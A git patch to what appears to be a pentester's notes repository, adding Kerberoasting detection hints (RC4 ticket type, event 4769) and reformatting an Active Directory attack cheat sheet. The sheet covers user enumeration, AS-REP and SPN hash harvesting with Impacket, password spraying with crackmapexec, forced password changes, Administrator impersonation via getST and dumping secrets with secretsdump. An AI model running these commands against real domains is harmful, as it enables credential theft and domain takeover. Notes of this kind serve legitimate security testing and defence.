From ccaa96dab551e089b3947e62cd4fb70ad3943234 Mon Sep 17 00:00:00 2001
From: gurkenhabicht <info@intheopen.org>
Date: Fri, 3 Apr 2026 21:17:36 +0200
Subject: [PATCH] added kerberoastable information

---
 Enumeration/Kerberoast.md       | 38 +++++++++++++++++++++++----------
 Forensics/Windows Event Logs.md |  1 +
 2 files changed, 28 insertions(+), 11 deletions(-)

diff --git a/Enumeration/Kerberoast.md b/Enumeration/Kerberoast.md
index 0d980ab..76318f1 100644
--- a/Enumeration/Kerberoast.md
+++ b/Enumeration/Kerberoast.md
@@ -1,5 +1,10 @@
 # Kerberoast
 
+An indicator for kerberoast are downgraded RC4 encryption instead of AES.
+That means `Ticket_Encryption_Type=0x17` (RC4) instead of `0x12` (AES-256).
+
+The event code for TGS, which is needed for kerberoasting is `4769`.
+
 ## Usage
 
 ### List users
@@ -10,17 +15,21 @@ kerbrute userenmum --dc $TARGET_IP --domain $DOMAIN $USER_LIST --downgrade
 ```
 
 ### Get Users
+
 * Impacket's `GetNPUsers.py` to get Hashes of userlist
+
 ```sh
 GetNPUsers.py -no-pass <DomainName>/  -usersfile users.txt -format john -outputfile hashes
 ```
 
 ### Find SPNs
- 
+
 ```sh
-GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP 
+GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
 ```
+
 or
+
 ```sh
 pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
 ```
@@ -32,12 +41,17 @@ findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
 ```
 
 ### Check Found Users
-* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
+
+Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
+
 ```sh
 crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
 ```
-    * Watch out for `STATUS_PASSWORD_MUST_CHANGE`
-    * Change password with 
+
+Watch out for `STATUS_PASSWORD_MUST_CHANGE`
+
+Change password with
+
 ```sh
 smbpasswd.py <user>@$TARGET_IP  -newpass password123
 ```
@@ -47,10 +61,12 @@ smbpasswd.py <user>@$TARGET_IP  -newpass password123
 ```sh
 getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
 ```
-* Serviceticket is save as `Administrator.ccache`
-* `export KRB5CCNAME=Administrator.ccache`
-* After that dump secrets
-```sh
-secretsdump.py -k -no-pass <DOMAIN> 
-```
 
+* Serviceticket is safe as `Administrator.ccache`
+* `export KRB5CCNAME=Administrator.ccache`
+
+After that dump secrets:
+
+```sh
+secretsdump.py -k -no-pass <DOMAIN>
+```
diff --git a/Forensics/Windows Event Logs.md b/Forensics/Windows Event Logs.md
index f688420..952c0e0 100644
--- a/Forensics/Windows Event Logs.md	
+++ b/Forensics/Windows Event Logs.md	
@@ -65,6 +65,7 @@ The `subject` is the account doing an action on an `object`.
 * **4756**: Attempt to add an account to a universal security group
 * **4757**: Attempt to remove an account from a universal security group
 * **4768**: Kerberos TGT request
+* **4769**: Kerberos TGS request
 * **4771**: Kerberos pre-auth failure
 
 ### Account Logon